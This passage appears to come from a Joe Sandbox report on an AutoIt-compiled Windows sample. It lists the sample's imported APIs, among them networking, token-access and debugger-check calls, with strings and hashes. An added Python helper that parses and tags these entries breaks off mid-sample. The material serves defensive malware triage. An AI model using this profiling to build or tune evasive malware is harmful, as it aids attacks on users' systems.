                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                      • String ID:
                                                      • API String ID: 2710830443-0
                                                      APIs
                                                      • GetSysColor.USER32(00000008), ref: 0012260D
                                                      • SetTextColor.GDI32(?,000000FF), ref: 00122617
                                                      • SetBkMode.GDI32(?,00000001), ref: 0012262C
                                                      • GetStockObject.GDI32(00000005), ref: 00122634
                                                      • GetWindowDC.USER32(?,00000000), ref: 0015C1C4
                                                      • GetPixel.GDI32(00000000,00000000,00000000), ref: 0015C1D1
                                                      • GetPixel.GDI32(00000000,?,00000000), ref: 0015C1EA
                                                      • GetPixel.GDI32(00000000,00000000,?), ref: 0015C203
                                                      • GetPixel.GDI32(00000000,?,?), ref: 0015C223
                                                      • ReleaseDC.USER32(?,00000000), ref: 0015C22E
                                                      Similarity
                                                      • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                                                      • String ID:
                                                      • API String ID: 1946975507-0
                                                      APIs
                                                      • GetCurrentThread.KERNEL32 ref: 00179339
                                                      • OpenThreadToken.ADVAPI32(00000000,?,?,?,00178F04), ref: 00179340
                                                      • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,00178F04), ref: 0017934D
                                                      • OpenProcessToken.ADVAPI32(00000000,?,?,?,00178F04), ref: 00179354
                                                      Similarity
                                                      • API ID: CurrentOpenProcessThreadToken
                                                      • String ID:
                                                      • API String ID: 3974789173-0
                                                      APIs
                                                      • GetDesktopWindow.USER32 ref: 00160679
                                                      • GetDC.USER32(00000000), ref: 00160683
                                                      • GetDeviceCaps.GDI32(00000000,0000000C), ref: 001606A3
                                                      • ReleaseDC.USER32(?), ref: 001606C4
                                                      Similarity
                                                      • API ID: CapsDesktopDeviceReleaseWindow
                                                      • String ID:
                                                      • API String ID: 2889604237-0
                                                      APIs
                                                      • GetDesktopWindow.USER32 ref: 0016068D
                                                      • GetDC.USER32(00000000), ref: 00160697
                                                      • GetDeviceCaps.GDI32(00000000,0000000C), ref: 001606A3
                                                      • ReleaseDC.USER32(?), ref: 001606C4
                                                      Similarity
                                                      • API ID: CapsDesktopDeviceReleaseWindow
                                                      • String ID:
                                                      • API String ID: 2889604237-0
                                                      APIs
                                                        • Part of subcall function 0013436A: _wcscpy.LIBCMT ref: 0013438D
                                                        • Part of subcall function 00124D37: __itow.LIBCMT ref: 00124D62
                                                        • Part of subcall function 00124D37: __swprintf.LIBCMT ref: 00124DAC
                                                      • __wcsnicmp.LIBCMT ref: 0018B670
                                                      • WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 0018B739
                                                      Similarity
                                                      • API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
                                                      • String ID: LPT
                                                      • API String ID: 3222508074-1350329615
                                                      APIs
                                                      • Sleep.KERNEL32(00000000), ref: 0012E01E
                                                      • GlobalMemoryStatusEx.KERNEL32(?), ref: 0012E037
                                                      Similarity
                                                      • API ID: GlobalMemorySleepStatus
                                                      • String ID: @
                                                      • API String ID: 2783356886-2766056989
                                                      APIs
                                                      • SendMessageW.USER32(00000027,00001132,00000000,?), ref: 001A8186
                                                      • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 001A819B
                                                      Similarity
                                                      • API ID: MessageSend
                                                      • String ID: '
                                                      • API String ID: 3850602802-1997036262
                                                      APIs
                                                      • _memset.LIBCMT ref: 00192C6A
                                                      • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 00192CA0
                                                      Similarity
                                                      • API ID: CrackInternet_memset
                                                      • String ID: |
                                                      • API String ID: 1413715105-2343686810
                                                      APIs
                                                      • DestroyWindow.USER32(?,?,?,?), ref: 001A713C
                                                      • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 001A7178
                                                      Similarity
                                                      • API ID: Window$DestroyMove
                                                      • String ID: static
                                                      • API String ID: 2139405536-2160076837
                                                      APIs
                                                      • _memset.LIBCMT ref: 001830B8
                                                      • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 001830F3
                                                      Similarity
                                                      • API ID: InfoItemMenu_memset
                                                      • String ID: 0
                                                      • API String ID: 2223754486-4108050209
                                                      APIs
                                                      • __snwprintf.LIBCMT ref: 00194132
                                                        • Part of subcall function 00131A36: _memmove.LIBCMT ref: 00131A77
                                                      Similarity
                                                      • API ID: __snwprintf_memmove
                                                      • String ID: , $$AUTOITCALLVARIABLE%d
                                                      • API String ID: 3506404897-2584243854
                                                      APIs
                                                      • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 001A6D86
                                                      • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 001A6D91
                                                      Similarity
                                                      • API ID: MessageSend
                                                      • String ID: Combobox
                                                      • API String ID: 3850602802-2096851135
                                                      APIs
                                                        • Part of subcall function 00122111: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0012214F
                                                        • Part of subcall function 00122111: GetStockObject.GDI32(00000011), ref: 00122163
                                                        • Part of subcall function 00122111: SendMessageW.USER32(00000000,00000030,00000000), ref: 0012216D
                                                      • GetWindowRect.USER32(00000000,?), ref: 001A7296
                                                      • GetSysColor.USER32(00000012), ref: 001A72B0
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                       • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmp
                                                       • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmp
                                                       • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmp
                                                       • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmp
                                                       • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                      • String ID: static
                                                      • API String ID: 1983116058-2160076837
                                                      • Opcode ID: 28ef939c105f48884a2ae6e38d8a7990a5b3ae0184478124a39e773241c6a709
                                                      • Instruction ID: e4433c04ae3043ab639a4ccd5a56dcd3162d687ede0fee7443cb08ccbd257fed
                                                      • Opcode Fuzzy Hash: 28ef939c105f48884a2ae6e38d8a7990a5b3ae0184478124a39e773241c6a709
                                                      • Instruction Fuzzy Hash: 0321597661420AAFDB05DFB8CC45EFA7BA8EB49314F004619FD55D3290E734E8A0DB50
                                                      APIs
                                                      • GetWindowTextLengthW.USER32(00000000), ref: 001A6FC7
                                                      • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 001A6FD6
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                       • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmp
                                                       • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmp
                                                       • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmp
                                                       • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmp
                                                       • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: LengthMessageSendTextWindow
                                                      • String ID: edit
                                                      • API String ID: 2978978980-2167791130
                                                      • Opcode ID: 280f28f984d852003125ab5418f79cab5158f059da4e277b094fc31c8d973428
                                                      • Instruction ID: 22a032729fb2ffb65217ff381bad3af4f71ae0e01084a614de055c0e647983b2
                                                      • Opcode Fuzzy Hash: 280f28f984d852003125ab5418f79cab5158f059da4e277b094fc31c8d973428
                                                      • Instruction Fuzzy Hash: EC116A79500208AFEB119E74ECA4EFB3B6AEB06368F144714FA64D71E0C735DC909B60
                                                      APIs
                                                      • _memset.LIBCMT ref: 001831C9
                                                      • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 001831E8
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                       • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmp
                                                       • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmp
                                                       • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmp
                                                       • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmp
                                                       • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: InfoItemMenu_memset
                                                      • String ID: 0
                                                      • API String ID: 2223754486-4108050209
                                                      • Opcode ID: a6de7446acb1b18a0fcb4d0c436d333b4f1d4fcb1b5be98f62864b383a7329db
                                                      • Instruction ID: e13c3952ffdbd2b4a840837d3b24d9214ebf269746d050cde802b91fc9590a8f
                                                      • Opcode Fuzzy Hash: a6de7446acb1b18a0fcb4d0c436d333b4f1d4fcb1b5be98f62864b383a7329db
                                                      • Instruction Fuzzy Hash: 3711E231901114ABEB24FA98DC49BADB7B9AB15F10F1D0125E825A72A0DB70AF06CF91
                                                      APIs
                                                      • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 001928F8
                                                      • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00192921
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                       • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmp
                                                       • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmp
                                                       • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmp
                                                       • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmp
                                                       • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: Internet$OpenOption
                                                      • String ID: <local>
                                                      • API String ID: 942729171-4266983199
                                                      • Opcode ID: ed205861d918ae2f73187fdc50353c5cd429096528faf0c76304124a48ba34ad
                                                      • Instruction ID: 4bdd426952425d3bde4fa20adf2e6ebe406309fd9a98475f72a6b670ae16c672
                                                      • Opcode Fuzzy Hash: ed205861d918ae2f73187fdc50353c5cd429096528faf0c76304124a48ba34ad
                                                      • Instruction Fuzzy Hash: 6911C270501325BAEF298F518C89EFBFBACFF06755F10822AF54556100E7706994D6F0
                                                      APIs
                                                        • Part of subcall function 001986E0: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,0019849D,?,00000000,?,?), ref: 001986F7
                                                      • inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 001984A0
                                                      • htons.WSOCK32(00000000,?,00000000), ref: 001984DD
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                       • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmp
                                                       • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmp
                                                       • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmp
                                                       • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmp
                                                       • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: ByteCharMultiWidehtonsinet_addr
                                                      • String ID: 255.255.255.255
                                                      • API String ID: 2496851823-2422070025
                                                      • Opcode ID: 1f31b57e542fe4e3e519d158d335f234f5db8bfb5879c751e9b9416922d408a4
                                                      • Instruction ID: 155669998d6b6d694db668a9913897442799437cf63281474e8dd51f2fe75225
                                                      • Opcode Fuzzy Hash: 1f31b57e542fe4e3e519d158d335f234f5db8bfb5879c751e9b9416922d408a4
                                                      • Instruction Fuzzy Hash: F011A17560420AABDF14AF64CC46FEEB768FF15320F10861AF915972D2DB71B810C795
                                                      APIs
                                                        • Part of subcall function 00131A36: _memmove.LIBCMT ref: 00131A77
                                                        • Part of subcall function 0017B79A: GetClassNameW.USER32(?,?,000000FF), ref: 0017B7BD
                                                      • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00179A2B
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                       • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmp
                                                       • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmp
                                                       • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmp
                                                       • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmp
                                                       • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: ClassMessageNameSend_memmove
                                                      • String ID: ComboBox$ListBox
                                                      • API String ID: 372448540-1403004172
                                                      • Opcode ID: ecf4ce5eedd00f13e4d3bca489b44bb569a5410b0bea345eabc7a444b9deb32e
                                                      • Instruction ID: d303fdb6f4f3cfee9cde54a1f547fd9a6c444523f92f89299329415abc10af23
                                                      • Opcode Fuzzy Hash: ecf4ce5eedd00f13e4d3bca489b44bb569a5410b0bea345eabc7a444b9deb32e
                                                      • Instruction Fuzzy Hash: CA01B571A42224BBCF18EBA4CC51DFE7779AF66320F104719F865573D1DB3059089650
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                       • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmp
                                                       • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmp
                                                       • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmp
                                                       • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmp
                                                       • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: __fread_nolock_memmove
                                                      • String ID: EA06
                                                      • API String ID: 1988441806-3962188686
                                                      • Opcode ID: 0ce28e51912f6ee1662578bff84ec4ca1410645e584e21fb2e42f6594f401a9a
                                                      • Instruction ID: 136fcaf2a217b1c0d6a3c6190d25ee48c33c9fc21bdb982ad07f9de0cdf36a4d
                                                      • Opcode Fuzzy Hash: 0ce28e51912f6ee1662578bff84ec4ca1410645e584e21fb2e42f6594f401a9a
                                                      • Instruction Fuzzy Hash: 2B01F9729042587EDB18C6A8C856EBE7BF89B11301F04419AF553D2281E674A6048B60
                                                      APIs
                                                        • Part of subcall function 00131A36: _memmove.LIBCMT ref: 00131A77
                                                        • Part of subcall function 0017B79A: GetClassNameW.USER32(?,?,000000FF), ref: 0017B7BD
                                                      • SendMessageW.USER32(?,00000180,00000000,?), ref: 00179923
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                       • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmp
                                                       • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmp
                                                       • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmp
                                                       • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmp
                                                       • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: ClassMessageNameSend_memmove
                                                      • String ID: ComboBox$ListBox
                                                      • API String ID: 372448540-1403004172
                                                      • Opcode ID: cbbdcc6ef31ac14061aa09fb8b48c205ea2dabc52ba68438dc23782d96b8050c
                                                      • Instruction ID: 17d58ab3871e1beb22be789b4b16ea8838e5cacb60b421ca05719b461bba508f
                                                      • Opcode Fuzzy Hash: cbbdcc6ef31ac14061aa09fb8b48c205ea2dabc52ba68438dc23782d96b8050c
                                                      • Instruction Fuzzy Hash: 5201D6B2A821087BDF18EBA0C952EFF77BD9F25340F14411AB946A32C1DB105F0C96B1
                                                      APIs
                                                        • Part of subcall function 00131A36: _memmove.LIBCMT ref: 00131A77
                                                        • Part of subcall function 0017B79A: GetClassNameW.USER32(?,?,000000FF), ref: 0017B7BD
                                                      • SendMessageW.USER32(?,00000182,?,00000000), ref: 001799A6
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                       • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmp
                                                       • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmp
                                                       • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmp
                                                       • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmp
                                                       • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: ClassMessageNameSend_memmove
                                                      • String ID: ComboBox$ListBox
                                                      • API String ID: 372448540-1403004172
                                                      • Opcode ID: a2425ec3ea5f3c641bb3ea2f05ad8bc9189b73f553777d2df86135871f6ac7a0
                                                      • Instruction ID: 12e0058a8609a1dde46b20a8dfaf7f1790900acc4b3f9f7f0d1071e0fc458ac7
                                                      • Opcode Fuzzy Hash: a2425ec3ea5f3c641bb3ea2f05ad8bc9189b73f553777d2df86135871f6ac7a0
                                                      • Instruction Fuzzy Hash: 2C01D6B2A4610877DF14EBA4C952EFF77BC9F21340F50411AB989A3281DB245F0C96B1
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                       • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmp
                                                       • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmp
                                                       • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmp
                                                       • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmp
                                                       • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: ClassName_wcscmp
                                                      • String ID: #32770
                                                      • API String ID: 2292705959-463685578
                                                      • Opcode ID: 37c56c50912a089bbaab7eaa776fdb823b7bb5ba5efad0b1643c35214ad22d98
                                                      • Instruction ID: 61f1595dfcb9efa4da341155d1be6a53265f22952c397bfba267149bdbc0c442
                                                      • Opcode Fuzzy Hash: 37c56c50912a089bbaab7eaa776fdb823b7bb5ba5efad0b1643c35214ad22d98
                                                      • Instruction Fuzzy Hash: F2E068336002282BD320AA99AC49FABFBECEB18771F000157FC04D7051EF60AA408BE0
                                                      APIs
                                                      • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 001788A0
                                                        • Part of subcall function 00143588: _doexit.LIBCMT ref: 00143592
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                       • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmp
                                                       • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmp
                                                       • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmp
                                                       • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmp
                                                       • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: Message_doexit
                                                      • String ID: AutoIt$Error allocating memory.
                                                      • API String ID: 1993061046-4017498283
                                                      • Opcode ID: 8c7d3ed4b2e9a8a8fdedd0c53a591cc7764601ff7934fc1f415fba35f9d7ccfa
                                                      • Instruction ID: e1b59623132611badb7805142616147e5e76df9365aa9e802f92e2f410e90d20
                                                      • Opcode Fuzzy Hash: 8c7d3ed4b2e9a8a8fdedd0c53a591cc7764601ff7934fc1f415fba35f9d7ccfa
                                                      • Instruction Fuzzy Hash: 55D05B3138535832D21572E46D0BFCA7B488F19B51F044426FB08A55D38BD595D042D5
                                                      APIs
                                                        • Part of subcall function 0015B544: _memset.LIBCMT ref: 0015B551
                                                        • Part of subcall function 00140B74: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,0015B520,?,?,?,0012100A), ref: 00140B79
                                                      • IsDebuggerPresent.KERNEL32(?,?,?,0012100A), ref: 0015B524
                                                      • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,0012100A), ref: 0015B533
                                                      Strings
                                                      • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 0015B52E
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                       • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmp
                                                       • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmp
                                                       • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmp
                                                       • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmp
                                                       • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
                                                      • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                      • API String ID: 3158253471-631824599
                                                      • Opcode ID: 5f6273b61b817f8db5590d5f241383affe6a6392ba67f476ecc34e57a0fe2775
                                                      • Instruction ID: 9bc735918f653d4d5e478b309cb12d26c6ca9327fb93050c6fa8de75e27ef52f
                                                      • Opcode Fuzzy Hash: 5f6273b61b817f8db5590d5f241383affe6a6392ba67f476ecc34e57a0fe2775
                                                      • Instruction Fuzzy Hash: 37E09270204311CFD3219F75E548B467AE0AF18345F048A5DE866CB751EBB4D588CBA1
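The function entries above (APIs / Strings / Memory Dump Source / Similarity blocks emitted by the Joe Sandbox IDA plugin) are the raw material for triage, but hundreds of them are GUI plumbing. The following is an added triage helper, not part of the Joe Sandbox report and not Joe Sandbox's own code: it parses entries in exactly the layout printed above, records which imported APIs each function calls directly versus through a subcall, tags each function with a coarse capability bucket, and names the dwOption value of any InternetSetOptionW call using the option numbers from wininet.h. The capability buckets are our own grouping (an assumption, not Joe Sandbox signature names), and the sample text is three entries copied from this report with the repeated dump-source lines trimmed.

```python
# Added triage helper for Joe Sandbox IDA-plugin function entries (not report code).
import re
from dataclasses import dataclass, field
from typing import Optional

API_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-F]+):\s*)?"
    r"(?P<name>[A-Za-z_]\w*)\.(?P<mod>[A-Z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]+)\s*$"
)
STRING_RE = re.compile(r"^\s*•\s*(?P<text>.*), xrefs: [0-9A-F]+\s*$")
SIM_RE = re.compile(r"^\s*•\s*(?P<key>API ID|String ID|Instruction Fuzzy Hash):\s*(?P<val>.*?)\s*$")
SECTIONS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}

# Our own coarse buckets, keyed on imported API name (assumption, not a Joe Sandbox taxonomy).
CAPABILITIES = {
    "network": {"InternetOpenW", "InternetSetOptionW", "inet_addr", "htons"},
    "anti_debug": {"IsDebuggerPresent", "OutputDebugStringW"},
    "dynamic_api": {"LoadLibraryA", "GetProcAddress"},
    "gui": {"SendMessageW", "CreateWindowExW", "GetClassNameW", "GetWindowTextLengthW", "MessageBoxW"},
}
# dwOption values from wininet.h; 0x32 in the report is 50 = INTERNET_OPTION_CONNECTED_STATE,
# whose INTERNET_CONNECTED_INFO payload is the 8 bytes the call passes as dwBufferLength.
WININET_OPTIONS = {2: "INTERNET_OPTION_CONNECT_TIMEOUT", 5: "INTERNET_OPTION_SEND_TIMEOUT",
                   6: "INTERNET_OPTION_RECEIVE_TIMEOUT", 31: "INTERNET_OPTION_SECURITY_FLAGS",
                   38: "INTERNET_OPTION_PROXY", 41: "INTERNET_OPTION_USER_AGENT",
                   50: "INTERNET_OPTION_CONNECTED_STATE"}

@dataclass
class ApiCall:
    name: str
    module: str
    args: list
    ref: str
    subcall_of: Optional[str]  # set when the report marks the call "Part of subcall function"

@dataclass
class FunctionEntry:
    apis: list = field(default_factory=list)
    strings: list = field(default_factory=list)
    api_id: str = ""
    string_id: str = ""
    fuzzy_hash: str = ""

    def capabilities(self) -> set:
        names = {a.name for a in self.apis}
        return {cap for cap, apis in CAPABILITIES.items() if names & apis}

    def wininet_options(self) -> list:
        """Decode the second argument (dwOption) of every InternetSetOptionW call."""
        out = []
        for a in self.apis:
            if a.name == "InternetSetOptionW" and len(a.args) >= 2 and a.args[1] != "?":
                opt = int(a.args[1], 16)
                out.append(WININET_OPTIONS.get(opt, f"option {opt}"))
        return out

def parse_entries(text: str) -> list:
    """Walk the report text; every 'APIs' header opens a new function entry."""
    entries, section, cur = [], None, None
    for line in text.splitlines():
        stripped = line.strip()
        if stripped in SECTIONS:
            section = stripped
            if section == "APIs":
                cur = FunctionEntry()
                entries.append(cur)
            continue
        if cur is None:
            continue
        if section == "APIs" and (m := API_RE.match(line)):
            args = [s.strip() for s in m["args"].split(",")] if m["args"] else []
            cur.apis.append(ApiCall(m["name"], m["mod"], args, m["ref"], m["sub"]))
        elif section == "Strings" and (m := STRING_RE.match(line)):
            cur.strings.append(m["text"])
        elif section == "Similarity" and (m := SIM_RE.match(line)):
            if m["key"] == "API ID":
                cur.api_id = m["val"]
            elif m["key"] == "String ID":
                cur.string_id = m["val"]
            else:
                cur.fuzzy_hash = m["val"]
    return entries

def triage(text: str) -> list:
    """One summary row per function: direct imports, capability tags, decoded options, strings."""
    return [{
        "api_id": e.api_id,
        "direct_apis": [a.name for a in e.apis if a.subcall_of is None],
        "caps": sorted(e.capabilities()),
        "wininet": e.wininet_options(),
        "strings": e.strings,
        "fuzzy_hash": e.fuzzy_hash,
    } for e in parse_entries(text)]

# Constructed sample: three entries copied from the report above, dump-source lines trimmed.
SAMPLE = """\
APIs
• InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 001928F8
• InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00192921
Strings
Memory Dump Source
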